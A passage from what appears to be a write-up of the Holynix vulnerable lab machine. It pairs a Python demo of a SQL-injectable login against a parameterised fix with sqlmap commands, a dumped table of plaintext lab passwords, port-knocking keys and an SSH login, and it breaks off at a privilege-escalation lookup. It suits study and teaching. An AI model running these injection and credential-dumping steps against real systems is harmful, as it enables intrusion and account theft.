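    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (cid INTEGER PRIMARY KEY, upload INTEGER, "
                 "username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?)", ACCOUNTS)
    return conn


def build_query_vulnerable(username: str, password: str) -> str:
    """header.php as written: the quote in the password closes the literal,
    'or (1=1)' makes the WHERE clause true for every row and the comment
    marker discards the trailing quote."""
    return ("SELECT * FROM accounts WHERE username='" + username
            + "' AND password='" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """Return the cid that would be written into the uid cookie, or None.
    With the payload, the first row (cid 1) is returned regardless of credentials."""
    row = conn.execute(build_query_vulnerable(username, password)).fetchone()
    return row[0] if row else None


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """Placeholders: the quote in the payload stays data and matches nothing."""
    row = conn.execute(
        "SELECT cid FROM accounts WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = open_db()
    print(build_query_vulnerable("admin", PAGE_PAYLOAD))
    print("vulnerable:", login_vulnerable(db, "admin", SQLITE_PAYLOAD))
    print("parameterised:", login_parameterised(db, "admin", SQLITE_PAYLOAD))
```

The table also keeps passwords in clear, as the sqlmap dump shows; hashing them is a separate fix that this example does not cover.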


sqlmap -u "http://192.168.56.102/index.php?page=login.php" --cookie="uid=2" --level=5 --risk=5
[WARNING] GET parameter 'page' is not injectable
[WARNING] Cookie parameter 'uid' is not injectable

sqlmap -u "http://192.168.56.102/index.php?page=login.php" --data="user_name=admin&password=pass&Submit_button=Submit"

--dbs

available databases [4]:                                                                                                                           
[*] clients
[*] creds
[*] information_schema
[*] mysql

--dump-all

cat /usr/share/sqlmap/output/192.168.56.102/dump/creds/accounts.csv

cid,upload,username,password
1,0,alamo,Ih%40cK3dM1cR05oF7
2,1,etenenbaum,P3n7%40g0n0wN3d
3,1,gmckinnon,d15cL0suR3Pr0J3c7
4,1,hreiser,Ik1Ll3dNiN%40r315er
5,1,jdraper,p1%40yIngW17hPh0n35
6,1,jjames,%40rR35t3D%40716
7,1,jljohansen,m%40k1nGb0o7L3g5
8,1,kpoulsen,wH%407ar37H3Fed5D01n
9,0,ltorvalds,f%407H3r0FL1nUX
10,1,mrbutler,n%405aHaSw0rM5
11,1,rtmorris,Myd%40d51N7h3NSA

Exploit ssh:
mkdir .knockknock && cd .knockknock && mkdir 192.168.56.102 && cd 192.168.56.102
echo WC8pOHq67KHzuYEvH9qPRA== > cipher.key
echo [main]> config
echo knock_port = 13821 >> config
echo 32 > counter
echo OcOlArxJEvH7iecDOZGAmw== > mac.key
root@kali:~/knockknock-0.7# python knockknock.py -p 22 192.168.56.102
*** Success: knock sent.
ssh gmckinnon@192.168.56.102
gmckinnon@192.168.56.102's password: <- d15cL0suR3Pr0J3c7
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
gmckinnon@holynix:~$

gmckinnon@holynix:~$ sudo -l
User gmckinnon may run the following commands on this host:
    (root) /bin/false

gmckinnon@holynix:~$ uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux

Next Phase: Privilege escalation......

root@kali:~# searchsploit changetrack
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Changetrack 4.3-3 Local Privilege Escalation Vulnerability                  /linux/local/9709.txt
